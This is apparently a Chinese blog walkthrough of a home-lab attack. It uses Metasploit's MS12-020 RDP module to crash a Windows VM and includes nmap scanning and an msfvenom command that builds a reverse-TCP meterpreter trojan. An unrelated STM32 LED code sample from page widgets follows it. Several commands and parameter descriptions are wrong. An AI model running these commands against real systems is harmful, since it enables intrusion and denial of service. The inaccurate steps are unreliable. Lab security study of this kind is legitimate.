远程控制——ms12-020漏洞利用

简单介绍Metaspoit

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。Metasploit还提供了一系列可直接运行的功能程序,支持渗透测试者与安全研究人员快速地利用Metasploit框架内部能力完成一些特定任务。比如msfpayload、msfencode和msfvenom可以将攻击载荷封装为可执行文件、C语言、JavaScript语言等多种形式,并可以进行各种类型的编码。

Metasploit的启动

打开终端,在里面输入 msfconsole

每次打开的图案可能都不同,这次是爱心,下次可能是个鸭。这个没什么其他含义,不用管。

图中还给出当前的Metaspoit的版本为v6.1.4 。其中包含了2162个expoits、1147个auxiliary、367个post、592个payloads、45个encoders、10个nops。

更多的Metaspoit的相关知识在这里就不再追溯了,Metaspoit的基本命令参考相关链接

Metasploit常用命令

应用——远程攻击

一、两个虚拟机的网络连接方式都是桥接。

3389端口是Windows2000(2003) Server远程桌面的服务端口,可以通过这个端口,用"远程桌面"等连接工具来连接到远程的服务器,如果连接上了,输入系统管理员的用户名和密码后,将变得可以像操作本机一样操作远程的电脑,因此远程服务器一般都将这个端口修改数值或者关闭。所以,3389端口一般是关闭的,要进行远程控制,靶机要开启3389端口,我们先手动打开靶机的3389端口。如图。

其他开启3389端口的方法,可参考以下链接

如何在自己的电脑上开启3389端口?

二、nmap扫描出开启3389的主机

1、扫描一下同一网段下的主机  nmap -sP 192.168.43.79/24

 发现了我的靶机。

2、对它扫描一下,发现它的3389已经开启。(平时是关闭的,但是前面已经手动打开了)

三、msfmsfvenom

msfvenom更多的使用可参考以下链接(别人的笔记)

metasploit 之 msfvenom的使用

1、制作木马,在终端输入 msfvenom -p windows/meterpreter/revers_tcp lhost=192.168.43.56 lport=5000 -f exe -o /root/payload.exe

注:

-p 选择一个payload

-f 生成的文件格式

-o(或者 > ) 输出路径

lhost=目标主机 lport=目标端口

 

2、启动Metasploit。打开终端,在里面输入 msfconsole

 

3、查找ms12-020漏洞 search ms12-020

ms12-020漏洞:远程桌面中的漏洞可能允许远程执行代码

4、使用use进入模块 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

 

5、查看模块需要配置的参数:show options

6、 设置参数: set  rhost=192.168.43.56 (目标主机)

 7、攻击:run

 攻击后靶机蓝屏然后重启了。

  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
对于在STM32F407上实现流水灯,你可以按照以下步骤进行操作: 1. 首先,需要配置GPIO引脚为输出模式,并设置相应的引脚电平。可以使用STM32CubeMX工具来生成初始化代码,或者手动编写代码进行配置。 2. 创建一个循环,在循环中依次将各个引脚置高电平,然后延时一段时间,再依次将引脚置低电平,再延时一段时间。 3. 重复上述步骤,就可以实现流水灯效果。 下面是一个简单的示例代码,演示了如何在STM32F407上实现流水灯效果: ```c #include "stm32f4xx.h" #include "stm32f4xx_hal.h" // 定义LED引脚 #define LED_PIN_1 GPIO_PIN_12 #define LED_PIN_2 GPIO_PIN_13 #define LED_PIN_3 GPIO_PIN_14 #define LED_PIN_4 GPIO_PIN_15 // 定义延时时间 #define DELAY_MS 500 int main(void) { // 初始化HAL库 HAL_Init(); // 初始化GPIO库 __HAL_RCC_GPIOA_CLK_ENABLE(); GPIO_InitTypeDef GPIO_InitStruct; GPIO_InitStruct.Pin = LED_PIN_1 | LED_PIN_2 | LED_PIN_3 | LED_PIN_4; GPIO_InitStruct.Mode = GPIO_MODE_OUTPUT_PP; GPIO_InitStruct.Speed = GPIO_SPEED_FREQ_LOW; HAL_GPIO_Init(GPIOA, &GPIO_InitStruct); // 循环流水灯 while (1) { // 依次点亮LED HAL_GPIO_WritePin(GPIOA, LED_PIN_1, GPIO_PIN_SET); HAL_Delay(DELAY_MS); HAL_GPIO_WritePin(GPIOA, LED_PIN_2, GPIO_PIN_SET); HAL_Delay(DELAY_MS); HAL_GPIO_WritePin(GPIOA, LED_PIN_3, GPIO_PIN_SET); HAL_Delay(DELAY_MS); HAL_GPIO_WritePin(GPIOA, LED_PIN_4, GPIO_PIN_SET); HAL_Delay(DELAY_MS); // 依次熄灭LED HAL_GPIO_WritePin(GPIOA, LED_PIN_1 | LED_PIN_2 | LED_PIN_3 | LED_PIN_4, GPIO_PIN_RESET); HAL_Delay(DELAY_MS); } } ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值